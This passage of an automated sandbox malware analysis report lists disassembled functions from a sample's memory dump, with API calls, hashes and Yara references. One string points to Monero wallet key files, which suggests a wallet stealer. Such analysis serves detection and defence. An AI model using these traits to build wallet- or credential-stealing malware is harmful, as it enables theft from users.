                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                    • String ID:
                                    • API String ID: 3729781310-0
                                    • Opcode ID: 97f500e01f23649c3b2824d3bbebe772fd81b09365bea9dffba7659bc17edd62
                                    • Instruction ID: fd20e0c950bffbc78bad7a04ac31b14f9719d925bf12511cef8fde7ba54b5fdb
                                    • Opcode Fuzzy Hash: 97f500e01f23649c3b2824d3bbebe772fd81b09365bea9dffba7659bc17edd62
                                    • Instruction Fuzzy Hash: 06311A71A01348AFDB15DBE0CD49BEDB7B8EB48701F208459E506AA184DB74AA89CB52
                                    Function 000E8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000F05B7), ref: 000E86CA
                                    • Process32First.KERNEL32(?,00000128), ref: 000E86DE
                                    • Process32Next.KERNEL32(?,00000128), ref: 000E86F3
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • CloseHandle.KERNEL32(?), ref: 000E8761
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 0f54a6ed51e3e572cf2b4124fa8c0f949732497495cc7eb3115d5a7a280e146e
                                    • Instruction ID: a9893e8950d8ca9794227acef2786f1aa3fc111ce1edc4aefd67c4171b779185
                                    • Opcode Fuzzy Hash: 0f54a6ed51e3e572cf2b4124fa8c0f949732497495cc7eb3115d5a7a280e146e
                                    • Instruction Fuzzy Hash: F9316B71A01258AFCB25DF92DD81FEEB778EB49700F108199F10AB61A1DF306A45CFA1
                                    Function 000E7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000F0E00,00000000,?), ref: 000E79B0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E79B7
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,000F0E00,00000000,?), ref: 000E79C4
                                    • wsprintfA.USER32 ref: 000E79F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 3fc9cec830b6a7020a24f6ed1eedd0304f869cf9a7094823ab9b29900c4aed51
                                    • Instruction ID: f54e60e0c94bb0fedd3016661f4b26bb914130495394c1858d1a6b388cfd0411
                                    • Opcode Fuzzy Hash: 3fc9cec830b6a7020a24f6ed1eedd0304f869cf9a7094823ab9b29900c4aed51
                                    • Instruction Fuzzy Hash: 4E1118B2904518AACB14DFCADD45BFEBBFCEB4CB12F10421AF605A2280E2395940C7B1
                                    Function 000E92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(000E3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,000E3AEE,?), ref: 000E92FC
                                    • GetFileSizeEx.KERNEL32(000000FF,000E3AEE), ref: 000E9319
                                    • CloseHandle.KERNEL32(000000FF), ref: 000E9327
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: 7a163a6a4330b9aa4f21e33853e6dcad4d82fb91a9228c6e47f151079b4cda7f
                                    • Instruction ID: 62678ca7281f5dd4c5d15b61f554a4102facc7ec0b9bcfac58f5832bd5fb3869
                                    • Opcode Fuzzy Hash: 7a163a6a4330b9aa4f21e33853e6dcad4d82fb91a9228c6e47f151079b4cda7f
                                    • Instruction Fuzzy Hash: F3F03735E40208BBDB21DBF2DC49B9EB7B9AB4C721F10C254BA61A72C0D670AB018B40
                                    Function 000EC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 000EC74E
                                      • Part of subcall function 000EBF9F: __amsg_exit.LIBCMT ref: 000EBFAF
                                    • __getptd.LIBCMT ref: 000EC765
                                    • __amsg_exit.LIBCMT ref: 000EC773
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 000EC797
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: 41ed3f9cf576d8df5cd8a93266dcad98ff86cc02affc784a61a8c411c091a296
                                    • Instruction ID: b7cc04f7c27a02a9a4133c8c614713ba28a8737a6d4bc74f17c2212cd4023aca
                                    • Opcode Fuzzy Hash: 41ed3f9cf576d8df5cd8a93266dcad98ff86cc02affc784a61a8c411c091a296
                                    • Instruction Fuzzy Hash: 97F0F032A086909FE720BBBA9806BDE33E06F00720F204149F084BA1D3CB296842DE46
                                    Function 000E4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E4F7A
                                    • lstrcat.KERNEL32(?,000F1070), ref: 000E4F97
                                    • lstrcat.KERNEL32(?,00B78F98), ref: 000E4FAB
                                    • lstrcat.KERNEL32(?,000F1074), ref: 000E4FBD
                                      • Part of subcall function 000E4910: wsprintfA.USER32 ref: 000E492C
                                      • Part of subcall function 000E4910: FindFirstFileA.KERNEL32(?,?), ref: 000E4943
                                      • Part of subcall function 000E4910: StrCmpCA.SHLWAPI(?,000F0FDC), ref: 000E4971
                                      • Part of subcall function 000E4910: StrCmpCA.SHLWAPI(?,000F0FE0), ref: 000E4987
                                      • Part of subcall function 000E4910: FindNextFileA.KERNEL32(000000FF,?), ref: 000E4B7D
                                      • Part of subcall function 000E4910: FindClose.KERNEL32(000000FF), ref: 000E4B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: b29d2c6ada564be75a47af05dd2bf864d00da5f11092e71903f0ce78886b9624
                                    • Instruction ID: 8001bfb6a820d12d470231041464004f3531f0b7814c0d13e5f302d7a3d75ee4
                                    • Opcode Fuzzy Hash: b29d2c6ada564be75a47af05dd2bf864d00da5f11092e71903f0ce78886b9624
                                    • Instruction Fuzzy Hash: 6521D07A900218ABC755F7B0DC46EED333DA758301F008554B75956187DE7496C98BA3